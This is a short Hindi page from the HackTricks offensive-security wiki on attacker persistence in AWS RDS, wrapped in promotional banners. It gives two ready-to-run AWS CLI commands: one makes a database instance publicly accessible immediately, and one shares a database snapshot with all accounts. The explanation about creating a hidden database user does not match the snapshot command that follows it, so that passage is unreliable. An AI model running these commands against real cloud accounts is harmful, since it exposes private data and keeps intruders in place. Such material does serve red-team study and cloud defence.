AWS - RDS Persistence

AWS Hacking सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE) GCP Hacking सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks को समर्थन दें

सदस्यता योजनाओं की जाँच करें!
💬 Discord समूह या telegram समूह में शामिल हों या हमें Twitter 🐦 पर फॉलो करें @hacktricks_live.**
हैकिंग ट्रिक्स साझा करें HackTricks और HackTricks Cloud github repos में PRs सबमिट करके।

RDS

अधिक जानकारी के लिए देखें:

इस अनुमति के साथ एक हमलावर मौजूदा RDS इंस्टेंस को संशोधित कर सकता है ताकि सार्वजनिक पहुंच सक्षम हो सके।

aws rds modify-db-instance --db-instance-identifier target-instance --publicly-accessible --apply-immediately

एक हमलावर बस DB के अंदर एक यूजर बना सकता है ताकि भले ही मास्टर यूजर का पासवर्ड बदल दिया जाए, वह डेटाबेस तक पहुंच नहीं खोता।

aws rds modify-db-snapshot-attribute --db-snapshot-identifier <snapshot-name> --attribute-name restore --values-to-add all

AWS हैकिंग सीखें और अभ्यास करें:HackTricks Training AWS Red Team Expert (ARTE) GCP हैकिंग सीखें और अभ्यास करें: HackTricks Training GCP Red Team Expert (GRTE)

HackTricks को समर्थन दें

सदस्यता योजनाओं की जाँच करें!
💬 Discord समूह या telegram समूह में शामिल हों या हमें Twitter 🐦 पर फॉलो करें @hacktricks_live.**
PRs सबमिट करके हैकिंग ट्रिक्स साझा करें HackTricks और HackTricks Cloud github repos में।

Last updated 1 month ago